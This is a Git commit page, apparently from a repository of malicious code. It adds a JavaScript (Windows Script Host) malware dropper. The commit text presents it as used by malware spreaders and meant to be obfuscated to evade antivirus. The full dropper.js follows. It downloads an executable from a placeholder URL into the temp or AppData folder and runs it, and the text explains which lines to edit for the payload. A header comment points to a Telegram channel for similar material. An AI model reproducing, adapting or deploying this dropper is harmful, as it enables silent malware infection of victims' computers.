hax/sourcescodes
1
0
Fork 0
mirror of https://github.com/bl4d3rvnner7/sourcescodes.git synced 2025-12-16 16:34:05 +00:00
Code Issues Projects Releases Packages Wiki Activity Actions

👨‍💻 Simple Malware JS Dropper Source Code 👨‍💻

Browse source 
🔥 This code is a simple dropper, used recently by spreader. It will be obfuscated to avoid antivirus protection. To make sure how the script works, let me explain.

1️⃣ Download Payload

The script uses an HTTP request to download an executable file (windows.exe) from a specified URL (fileUrl).

var fileUrl = "https://url.com/windows.exe";
var httpRequest = WScript.CreateObject("Microsoft.XMLHTTP");
httpRequest.open("GET", fileUrl, false);
httpRequest.send();

2️⃣ Save the Payload 

The script saves the downloaded file to a specific location on the user's file system, either in the temporary files directory or the application data directory.

var stream = WScript.CreateObject("Adodb.Stream");
stream.Type = 1; // binary
stream.open();
stream.write(httpRequest.responseBody);
stream.savetofile(fileName, 2); // save to file
stream.close();

3️⃣ Execute the Payload

After saving the file, the script executes it. It checks the file extension to determine the appropriate method for execution:

➡️.jar files are run using java -jar.
➡️.vbs and .wsf files are run using wscript.
➡️Other file types are executed directly.

if (fileName.endsWith(".jar")) {
    shell.run("java -jar \"" + fileName + "\"");
} else if (fileName.endsWith(".vbs") || fileName.endsWith(".wsf")) {
    shell.run("wscript \"" + fileName + "\"");
} else {
    shell.run("\"" + fileName + "\"");
}

🦅 To edit the script, edit line...

➡️ 10 for the fileName.
➡️ 11 for the fileUrl.
➡️ 12 for the useTempPath (using it would be "true" and doesn't need admin)
This commit is contained in:
bl4d3rvnner7 2025-05-18 01:42:29 +02:00 committed by GitHub
parent 7a35304194
commit 8048d11754
No known key found for this signature in database
GPG key ID: B5690EEEBB952194
1 changed files with 42 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

42
dropper.js Normal file
View file

@ -0,0 +1,42 @@
/*
Scarletta's Lounge - https://t.me/+ZFUM798YLi5mODUy
This script was shared by @scarlettaowner, if you were interested in similar topic,dm me!
*/
try {
String.prototype.endsWith = function (suffix) {
var substring = this.substr(this.length - suffix.length);
return substring == suffix;
};
var shell = WScript.CreateObject("WScript.Shell");
var tempPath = shell.ExpandEnvironmentStrings("%temp%");
var appDataPath = shell.ExpandEnvironmentStrings("%appdata%");
var fileName = "windows.exe";
var fileUrl = "https://test/windows.exe";
var useTempPath = false;
if (useTempPath) {
fileName = tempPath + "\\" + fileName;
} else {
fileName = appDataPath + "\\" + fileName;
}
var httpRequest = WScript.CreateObject("Microsoft.XMLHTTP");
httpRequest.open("GET", fileUrl, false);
httpRequest.send();
if (httpRequest.status == 200) {
var stream = WScript.CreateObject("Adodb.Stream");
stream.Type = 1;
stream.open();
stream.write(httpRequest.responseBody);
stream.savetofile(fileName, 2);
stream.close();
if (fileName.endsWith(".jar")) {
shell.run("java -jar \"" + fileName + "\"");
} else if (fileName.endsWith(".vbs") || fileName.endsWith(".wsf")) {
shell.run("wscript \"" + fileName + "\"");
} else {
shell.run("\"" + fileName + "\"");
}
} else {
WScript.Echo("Expired link");
}
} catch (error) {}